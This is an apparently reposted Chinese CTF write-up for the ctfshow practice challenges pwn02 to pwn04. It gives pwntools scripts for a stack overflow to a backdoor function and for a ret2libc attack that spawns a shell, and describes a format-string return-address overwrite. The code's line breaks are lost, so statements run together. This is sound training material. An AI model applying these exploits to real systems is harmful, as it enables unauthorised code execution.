PWN-PRACTICE-CTFSHOW-1
生活随笔
收集整理的這篇文章主要介紹了
PWN-PRACTICE-CTFSHOW-1
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
PWN-PRACTICE-CTFSHOW-1
- PWN簽到題
- pwn02
- pwn03
- pwn04
PWN簽到題
nc連上去就會打印flag
pwn02
棧溢出,覆蓋返回地址為后門函數stack起始地址即可
# -*- coding:utf-8 -*- from pwn import * #io=process("./pwn1") io=remote("pwn.challenge.ctf.show",28194) elf=ELF("./pwn1")stack=0x0804850Fio.recvuntil("32bits\n\n") payload="a"*9+"bbbb"+p32(stack) io.sendline(payload)io.interactive()pwn03
棧溢出,ret2libc
# -*- coding:utf-8 -*- from pwn import * context.log_level="debug" #io=process("./pwn1") io=remote("pwn.challenge.ctf.show",28045) elf=ELF("./pwn1")puts_got=elf.got["puts"] puts_plt=elf.plt["puts"] main_addr=0x080484DF#gdb.attach(io,"b * 0x080484DD") #pause()io.recvuntil("32bits\n\n") payload="a"*9+"bbbb"+p32(puts_plt)+p32(main_addr)+p32(puts_got) io.sendline(payload) puts_addr=u32(io.recv(4)) print("puts_addr=="+hex(puts_addr)) # libc:libc6-i386_2.27-3ubuntu1_amd64 libc_base=puts_addr-0x067360 system=libc_base+0x03cd10 binsh=libc_base+0x17b8cfio.recvuntil("32bits\n\n") payload="a"*9+"bbbb"+p32(system)+p32(main_addr)+p32(binsh) io.sendline(payload)#pause()io.interactive()pwn04
兩次格式化字符串漏洞
第一次格式化字符串,隨便泄露一個棧上的地址,通過偏移得到返回地址在棧上的地址
第二次格式化字符串,覆蓋返回地址為后門函數getshell的起始地址
總結
以上是生活随笔為你收集整理的PWN-PRACTICE-CTFSHOW-1的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 4nm 3.2GHz死磕骁龙8+!一图看
- 下一篇: REVERSE-PRACTICE-BUU